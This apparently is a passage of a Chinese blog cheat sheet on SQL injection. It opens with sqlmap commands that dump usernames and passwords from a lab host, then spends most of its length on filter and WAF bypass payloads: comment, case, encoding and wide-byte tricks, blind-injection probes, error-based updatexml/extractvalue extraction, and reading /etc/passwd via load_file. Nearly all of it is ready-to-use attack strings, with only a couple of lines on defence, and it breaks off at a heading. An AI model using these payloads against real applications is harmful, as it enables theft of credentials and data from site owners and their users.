<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u "http://192.168.18.12/sqlilab/Less-9/?id=1" --batch --level=3 --risk=3 -D security -T us ers --C id,username,password --dump</span><br></pre></td></tr></table></div></figure>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># http头注入</span><br><span class="line">sqlmap.py -u “url” --host * --thread=1 --batch -v 1 --delay=0.7 --dbms mysql --current-db --current-user --dbs</span><br></pre></td></tr></table></div></figure>
<h2 id="0x02-绕过及过滤闭合" >
<a href="#0x02-绕过及过滤闭合" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x02-绕过及过滤闭合" class="headerlink" title="0x02 绕过及过滤闭合"></a>0x02 绕过及过滤闭合</h2>
<h3 id="1、绕过" >
<a href="#1、绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#1、绕过" class="headerlink" title="1、绕过"></a>1、绕过</h3>
<h4 id="1-注释符绕过" >
<a href="#1-注释符绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-注释符绕过" class="headerlink" title="1 注释符绕过"></a>1 注释符绕过</h4>
<p>常用注释符:</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//,</span><br><span class="line">-- ,</span><br><span class="line">/**/,</span><br><span class="line">#,</span><br><span class="line">--+,</span><br><span class="line">-- -,</span><br><span class="line">;,%00,</span><br><span class="line">--aUNION /**/ Select /**/user,pwd,from userU/**/ NION /**/ SE/**/ LECT /**/user,pwd from user</span><br></pre></td></tr></table></div></figure>
<p>绕过注释符号(#,–)过滤:</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">id<span class="operator">=</span><span class="number">1</span><span class="string">'union select 1,2,3||'</span><span class="number">1</span></span><br><span class="line"></span><br><span class="line">最后的<span class="keyword">or</span> <span class="string">'1闭合查询语句的最后的单引号,或者:</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">id=1'</span><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="string">'3</span></span><br></pre></td></tr></table></div></figure>
<h4 id="2-or-and-绕过" >
<a href="#2-or-and-绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-or-and-绕过" class="headerlink" title="2 or and 绕过"></a>2 or and 绕过</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span><span class="operator">=</span><span class="operator">&&</span> <span class="keyword">or</span><span class="operator">=</span><span class="operator">||</span></span><br><span class="line">(<span class="number">1</span>)大小写变形<span class="keyword">Or</span>,<span class="keyword">OR</span>,<span class="keyword">oR</span></span><br><span class="line">(<span class="number">2</span>)编码,hex,urlencode</span><br><span class="line">(<span class="number">3</span>)添加注释<span class="comment">/*or*/</span></span><br><span class="line">(<span class="number">4</span>)利用符号<span class="keyword">and</span><span class="operator">=</span><span class="operator">&&</span><span class="keyword">or</span><span class="operator">=</span><span class="operator">||</span></span><br></pre></td></tr></table></div></figure>
<h4 id="2-大小写绕过" >
<a href="#2-大小写绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-大小写绕过" class="headerlink" title="2 大小写绕过"></a>2 大小写绕过</h4>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1+UnIoN/**/SeLeCT</span><br></pre></td></tr></table></div></figure>
<h4 id="3-内联注释绕过" >
<a href="#3-内联注释绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#3-内联注释绕过" class="headerlink" title="3 内联注释绕过"></a>3 内联注释绕过</h4>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()-- -</span><br></pre></td></tr></table></div></figure>
<p>通常情况下,上面的代码可以绕过过滤器,请注意,我们用的是 Like而不是 =</p>
<h4 id="4-双关键字绕过" >
<a href="#4-双关键字绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#4-双关键字绕过" class="headerlink" title="4 双关键字绕过"></a>4 双关键字绕过</h4>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1+UNIunionON+SeLselectECT+1,2,3–</span><br></pre></td></tr></table></div></figure>
<h4 id="5-编码绕过" >
<a href="#5-编码绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#5-编码绕过" class="headerlink" title="5 编码绕过"></a>5 编码绕过</h4>
<p>如URLEncode编码,ASCII,HEX,unicode编码绕过</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">or</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span>即<span class="operator">%</span><span class="number">6</span>f<span class="operator">%</span><span class="number">72</span><span class="operator">%</span><span class="number">20</span><span class="operator">%</span><span class="number">31</span><span class="operator">%</span><span class="number">3</span>d<span class="operator">%</span><span class="number">31</span>,而Test也可以为<span class="type">CHAR</span>(<span class="number">101</span>)<span class="operator">+</span><span class="type">CHAR</span>(<span class="number">97</span>)<span class="operator">+</span><span class="type">CHAR</span>(<span class="number">115</span>)<span class="operator">+</span><span class="type">CHAR</span>(<span class="number">116</span>)。</span><br><span class="line"></span><br><span class="line">十六进制编码<span class="keyword">SELECT</span>(extractvalue(<span class="number">0x3C613E61646D696E3C2F613E</span>,<span class="number">0x2f61</span>))双重编码绕过</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> load_file(<span class="string">'0x2f6574632f706173737764'</span>);</span><br><span class="line">python</span><br><span class="line"><span class="operator">>></span><span class="operator">></span> <span class="string">'/etc/passwd'</span>.encode(<span class="string">'hex'</span>)</span><br><span class="line"><span class="string">'2f6574632f706173737764'</span></span><br><span class="line"></span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="operator">%</span><span class="number">252</span>f<span class="operator">%</span><span class="number">252</span>a<span class="operator">*</span><span class="operator">/</span><span class="keyword">UNION</span><span class="operator">%</span><span class="number">252</span>f<span class="operator">%</span><span class="number">252</span>a <span class="operator">/</span><span class="keyword">SELECT</span><span class="operator">%</span><span class="number">252</span>f<span class="operator">%</span><span class="number">252</span>a<span class="operator">*</span><span class="operator">/</span><span class="number">1</span>,<span class="number">2</span>,password<span class="operator">%</span><span class="number">252</span>f<span class="operator">%</span><span class="number">252</span>a<span class="operator">*</span><span class="operator">/</span><span class="keyword">FROM</span><span class="operator">%</span><span class="number">252</span>f<span class="operator">%</span><span class="number">252</span>a<span class="operator">*</span><span class="operator">/</span>Users<span class="comment">--+</span></span><br><span class="line"></span><br><span class="line">一些unicode编码举例: </span><br><span class="line"></span><br><span class="line">单引号:<span class="string">'%u0027 %u02b9 %u02bc%u02c8 %u2032%uff07 %c0%27%c0%a7 %e0%80%a7</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">空白:%u0020 %uff00%c0%20 %c0%a0 %e0%80%a0</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">左括号(:%u0028 %uff08%c0%28 %c0%a8%e0%80%a8</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">右括号):%u0029 %uff09%c0%29 %c0%a9%e0%80%a9</span></span><br></pre></td></tr></table></div></figure>
<p><strong>十六进制引号绕过</strong></p>
<p>users的十六进制的字符串是7573657273。那么最后的sql语句就变为了:</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">selectcolumn_namefrominformation_schema.tableswheretable_name<span class="operator">=</span><span class="number">0x7573657273</span></span><br></pre></td></tr></table></div></figure>
<h4 id="6-空格绕过" >
<a href="#6-空格绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#6-空格绕过" class="headerlink" title="6 空格绕过"></a>6 空格绕过</h4>
<p>两个空格代替一个空格,用Tab代替空格</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">%20 +</span><br><span class="line">%09 tab键(水平)</span><br><span class="line">%0a 新建一行</span><br><span class="line">%0b tab键(垂直)</span><br><span class="line">%0c 新建一页</span><br><span class="line">%0d return功能</span><br><span class="line">%a0 空格</span><br><span class="line">/**/</span><br></pre></td></tr></table></div></figure>
<p>括号绕过空格在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select(user())from dual where 1=1 and 2=2;</span><br></pre></td></tr></table></div></figure>
<h4 id="7-逗号绕过" >
<a href="#7-逗号绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#7-逗号绕过" class="headerlink" title="7 逗号绕过"></a>7 逗号绕过</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用<span class="keyword">from</span> <span class="keyword">to</span>的方式来解决:</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> substr(database() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>); # <span class="keyword">for</span> <span class="number">1</span>显示<span class="number">1</span>个字符 <span class="keyword">from</span> <span class="number">1</span>从第一个开始显示</span><br><span class="line"><span class="keyword">select</span> mid(database() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">对于limit可以使用<span class="keyword">offset</span>来绕过:</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> news limit <span class="number">0</span>,<span class="number">1</span># 等价于下面这条<span class="keyword">SQL</span>语句</span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> news limit <span class="number">1</span> <span class="keyword">offset</span> <span class="number">0</span></span><br><span class="line"></span><br><span class="line"># <span class="keyword">case</span> <span class="keyword">when</span> <span class="keyword">then</span></span><br><span class="line"><span class="number">1</span> mysql<span class="operator">></span> <span class="keyword">select</span> <span class="keyword">case</span> <span class="keyword">when</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span> <span class="keyword">then</span> sleep(<span class="number">2</span>) <span class="keyword">else</span> <span class="number">0</span> <span class="keyword">end</span>;</span><br><span class="line"><span class="number">2</span> <span class="operator">+</span><span class="comment">----------------------------------------+</span></span><br><span class="line"><span class="number">3</span> <span class="operator">|</span> <span class="keyword">case</span> <span class="keyword">when</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span> <span class="keyword">then</span> sleep(<span class="number">2</span>) <span class="keyword">else</span> <span class="number">0</span> <span class="keyword">end</span> <span class="operator">|</span></span><br><span class="line"><span class="number">4</span> <span class="operator">+</span><span class="comment">----------------------------------------+</span></span><br><span class="line"><span class="number">5</span> <span class="operator">|</span> <span class="number">0</span> <span class="operator">|</span></span><br><span class="line"><span class="number">6</span> <span class="operator">+</span><span class="comment">----------------------------------------+</span></span><br><span class="line"><span class="number">7</span> <span class="type">row</span> <span class="keyword">in</span> <span class="keyword">set</span> (<span class="number">2.00</span> sec)</span><br><span class="line"></span><br><span class="line"># <span class="keyword">join</span></span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>;</span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> ((<span class="keyword">select</span> <span class="number">1</span>)A <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">2</span>)B <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">3</span>)C <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">4</span>)D);</span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> ((<span class="keyword">select</span> <span class="number">1</span>)A <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">2</span>)B <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">3</span>)C <span class="keyword">join</span> (<span class="keyword">select</span> group_concat(<span class="keyword">user</span>(),<span class="string">' '</span>,database(),<span class="string">' '</span>,@<span class="variable">@datadir</span>))D);</span><br></pre></td></tr></table></div></figure>
<h4 id="8-比较符号-尖括号过滤绕过-lt-gt" >
<a href="#8-比较符号-尖括号过滤绕过-lt-gt" class="heading-link"><i class="fas fa-link"></i></a><a href="#8-比较符号-尖括号过滤绕过-lt-gt" class="headerlink" title="8 比较符号-尖括号过滤绕过<>"></a>8 比较符号-尖括号过滤绕过<></h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">同样是在使用盲注的时候,在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符,那么就需要使用到greatest来进行绕过了。</span><br><span class="line"></span><br><span class="line">最常见的一个盲注的<span class="keyword">sql</span>语句:</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> ascii(substr(database(),<span class="number">0</span>,<span class="number">1</span>))<span class="operator">></span><span class="number">64</span></span><br><span class="line"></span><br><span class="line">此时如果比较操作符被过滤,上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了。greatest(n1,n2,n3,...)函数返回输入参数(n1,n2,n3,...)的最大值。</span><br><span class="line"></span><br><span class="line">那么上面的这条<span class="keyword">sql</span>语句可以使用greatest变为如下的子句:</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> greatest(ascii(substr(database(),<span class="number">0</span>,<span class="number">1</span>)),<span class="number">64</span>)<span class="operator">=</span><span class="number">64</span></span><br></pre></td></tr></table></div></figure>
<h4 id="9-绕过" >
<a href="#9-绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#9-绕过" class="headerlink" title="9 =绕过"></a>9 =绕过</h4>
<p>like绕过 = </p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' or 1 like 1 </span></span><br><span class="line"><span class="string">绕过对“=”,“>”等的过滤</span></span><br></pre></td></tr></table></div></figure>
<h4 id="10-union,select,where等绕过" >
<a href="#10-union,select,where等绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#10-union,select,where等绕过" class="headerlink" title="10 union,select,where等绕过"></a>10 union,select,where等绕过</h4>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">(1)使用注释符绕过:</span><br><span class="line"></span><br><span class="line">常用注释符:</span><br><span class="line"></span><br><span class="line">//,-- , /**/, #, --+, -- -, ;,%00,--a</span><br><span class="line"></span><br><span class="line">用法:</span><br><span class="line"></span><br><span class="line">U/**/NION/**/SE/**/LECT/**/user,pwd from user</span><br><span class="line"></span><br><span class="line">(2)使用大小写绕过:</span><br><span class="line"></span><br><span class="line">id=-1'UnIoN/**/SeLeCT</span><br><span class="line"></span><br><span class="line">(3)内联注释绕过:</span><br><span class="line"></span><br><span class="line">id=-1'/*!UnIoN*/SeLeCT1,2,concat(/*!table_name*/) FrOM/*information_schema*/.tables/*!WHERE*//*!TaBlE_ScHeMa*/like database()#</span><br><span class="line"></span><br><span class="line">## (4) 双关键字绕过:</span><br><span class="line"></span><br><span class="line">id=-1'UNIunionONSeLselectECT1,2,3–-</span><br></pre></td></tr></table></div></figure>
<h4 id="10-通用绕过(编码):" >
<a href="#10-通用绕过(编码):" class="heading-link"><i class="fas fa-link"></i></a><a href="#10-通用绕过(编码):" class="headerlink" title="10.通用绕过(编码):"></a>10.通用绕过(编码):</h4>
<p>如URLEncode编码,ASCII,HEX,unicode编码绕过:</p>
<p>or1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。</p>
<h4 id="11-等价函数绕过" >
<a href="#11-等价函数绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#11-等价函数绕过" class="headerlink" title="11 等价函数绕过"></a>11 等价函数绕过</h4>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">hex()、bin()==>ascii()</span><br><span class="line"></span><br><span class="line">sleep()==>benchmark()</span><br><span class="line"></span><br><span class="line">concat_ws()==>group_concat()</span><br><span class="line"></span><br><span class="line">mid()、substr()==>substring() @@user==>user() @@datadir==>datadir()</span><br><span class="line"></span><br><span class="line">举例:substring()和substr()无法使用时:?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74或者:</span><br><span class="line"></span><br><span class="line">substr((select'password'),1,1)=0x70strcmp(left('password',1),0x69)=1strcmp(left('password',1),0x70)=0strcmp(left('password',1),0x71)=-1</span><br></pre></td></tr></table></div></figure>
<h4 id="12-宽字节绕过" >
<a href="#12-宽字节绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#12-宽字节绕过" class="headerlink" title="12 宽字节绕过"></a>12 宽字节绕过</h4>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">过滤单引号时,可以试试宽字节</span><br><span class="line">%bf%27 %df%27 %aa%27</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">过滤 ' 的时候往往利用的思路是将 ' 转换为 \' 。</span><br><span class="line">在 mysql 中使用 GBK 编码的时候,会认为两个字符为一个汉字,一般有两种思路:</span><br><span class="line"></span><br><span class="line">(1)%df 吃掉 \ 具体的方法是 urlencode('\) = %5c%27,我们在 %5c%27 前面添加 %df ,形成 %df%5c%27 ,而 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字,%df%5c 就是一个汉字,%27 作为一个单独的(')符号在外面:</span><br><span class="line">id=-1%df%27union select 1,user(),3--+</span><br><span class="line"></span><br><span class="line">(2)将 \' 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 ,后面的 %5c 会被前面的 %5c 注释掉。</span><br><span class="line">一般产生宽字节注入的PHP函数:</span><br><span class="line">1.replace():过滤 ' \ ,将 ' 转化为 \' ,将 \ 转为 \\,将 " 转为 \" 。用思路一。</span><br><span class="line">2.addslaches():返回在预定义字符之前添加反斜杠(\)的字符串。预定义字符:' , " , \ 。用思路一</span><br><span class="line">(防御此漏洞,要将 mysql_query 设置为 binary 的方式)</span><br><span class="line"></span><br><span class="line">3.mysql_real_escape_string():转义下列字符:</span><br><span class="line">\x00 \n \r \'" \x1a</span><br><span class="line">(防御,将mysql设置为gbk即可)</span><br></pre></td></tr></table></div></figure>
<h4 id="万能密钥绕过" >
<a href="#万能密钥绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#万能密钥绕过" class="headerlink" title="* 万能密钥绕过"></a>* 万能密钥绕过</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">用经典的<span class="keyword">or</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span>判断绕过,如<span class="keyword">or</span> ‘swords’ <span class="operator">=</span>’swords</span><br></pre></td></tr></table></div></figure>
<h4 id="8-号拆解字符串绕过" >
<a href="#8-号拆解字符串绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#8-号拆解字符串绕过" class="headerlink" title="8 +,-,.号拆解字符串绕过"></a>8 +,-,.号拆解字符串绕过</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' or '</span><span class="number">11</span><span class="operator">+</span><span class="number">11</span><span class="string">'='</span><span class="number">11</span><span class="operator">+</span><span class="number">11</span><span class="string">'</span></span><br><span class="line"><span class="string">"-"和"."</span></span><br></pre></td></tr></table></div></figure>
<h4 id="10-in绕过" >
<a href="#10-in绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#10-in绕过" class="headerlink" title="10 in绕过"></a>10 in绕过</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">or</span> <span class="string">'1'</span> <span class="keyword">IN</span> (<span class="string">'swords'</span>)</span><br></pre></td></tr></table></div></figure>
<h4 id="11-gt" >
<a href="#11-gt" class="heading-link"><i class="fas fa-link"></i></a><a href="#11-gt" class="headerlink" title="11 >,"></a>11 >,</h4>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">or</span> <span class="string">'password'</span> <span class="operator">></span> <span class="string">'pass'</span></span><br><span class="line"><span class="keyword">or</span> <span class="number">1</span><span class="operator"><</span><span class="number">3</span></span><br></pre></td></tr></table></div></figure>
<h4 id="12-等价函数与命令绕过" >
<a href="#12-等价函数与命令绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#12-等价函数与命令绕过" class="headerlink" title="12 等价函数与命令绕过"></a>12 等价函数与命令绕过</h4>
<p>1.函数或变量</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">hex()、bin() <span class="operator">=</span><span class="operator">=</span><span class="operator">></span> ascii()</span><br><span class="line">sleep() <span class="operator">=</span><span class="operator">=</span><span class="operator">></span>benchmark()</span><br><span class="line">concat_ws()<span class="operator">=</span><span class="operator">=</span><span class="operator">></span>group_concat()</span><br><span class="line">mid()、substr() <span class="operator">=</span><span class="operator">=</span><span class="operator">></span> <span class="built_in">substring</span>()</span><br><span class="line">@<span class="variable">@user</span> <span class="operator">=</span><span class="operator">=</span><span class="operator">></span> <span class="keyword">user</span>()</span><br><span class="line">@<span class="variable">@datadir</span> <span class="operator">=</span><span class="operator">=</span><span class="operator">></span> datadir()</span><br><span class="line"></span><br><span class="line">举例:<span class="built_in">substring</span>()和substr()无法使用时:</span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="operator">+</span><span class="keyword">and</span><span class="operator">+</span>ascii(<span class="built_in">lower</span>(mid((<span class="keyword">select</span><span class="operator">+</span>pwd<span class="operator">+</span><span class="keyword">from</span><span class="operator">+</span>users<span class="operator">+</span>limit<span class="operator">+</span><span class="number">1</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)))<span class="operator">=</span><span class="number">74</span> </span><br><span class="line">或者:</span><br><span class="line">substr((<span class="keyword">select</span> <span class="string">'password'</span>),<span class="number">1</span>,<span class="number">1</span>) <span class="operator">=</span> <span class="number">0x70</span>strcmp(<span class="keyword">left</span>(<span class="string">'password'</span>,<span class="number">1</span>), <span class="number">0x69</span>) <span class="operator">=</span> <span class="number">1</span>strcmp(<span class="keyword">left</span>(<span class="string">'password'</span>,<span class="number">1</span>), <span class="number">0x70</span>) <span class="operator">=</span> <span class="number">0</span>strcmp(<span class="keyword">left</span>(<span class="string">'password'</span>,<span class="number">1</span>), <span class="number">0x71</span>) <span class="operator">=</span> <span class="number">-1</span></span><br></pre></td></tr></table></div></figure>
<p>2.符号</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span>和<span class="keyword">or</span>有可能不能使用,可以试下<span class="operator">&&</span>和<span class="operator">||</span><span class="operator">=</span>不能使用的情况,可以考虑尝试</span><br></pre></td></tr></table></div></figure>
<p>3.生僻函数</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">MySQL<span class="operator">/</span>PostgreSQL支持XML函数:</span><br><span class="line"><span class="keyword">Select</span> UpdateXML(‘ ’,’<span class="operator">/</span>script<span class="operator">/</span><span class="variable">@x</span><span class="operator">/</span>’,’src<span class="operator">=</span><span class="operator">/</span><span class="operator">/</span>evil.com’); </span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span>(updatexml(<span class="number">1</span>,concat(<span class="number">0x3a</span>,(<span class="keyword">select</span> <span class="keyword">user</span>())),<span class="number">1</span>))</span><br><span class="line"></span><br><span class="line"><span class="keyword">SELECT</span> xmlelement(name img,xmlattributes(<span class="number">1</span><span class="keyword">as</span> src,<span class="string">'a\l\x65rt(1)'</span><span class="keyword">as</span> \<span class="number">117</span>n\x65rror)); <span class="operator">/</span><span class="operator">/</span>postgresql</span><br><span class="line"></span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> extractvalue(<span class="number">1</span>, concat(<span class="number">0x5c</span>, (<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables limit <span class="number">1</span>)));<span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span>(updatexml(<span class="number">1</span>,concat(<span class="number">0x5c</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x5c</span>),<span class="number">1</span>))<span class="keyword">and</span> extractvalue(<span class="number">1</span>, concat(<span class="number">0x5c</span>, (<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x5c</span>))</span><br></pre></td></tr></table></div></figure>
<h4 id="13-反引号-绕过" >
<a href="#13-反引号-绕过" class="heading-link"><i class="fas fa-link"></i></a><a href="#13-反引号-绕过" class="headerlink" title="13 反引号`绕过"></a>13 反引号`绕过</h4>
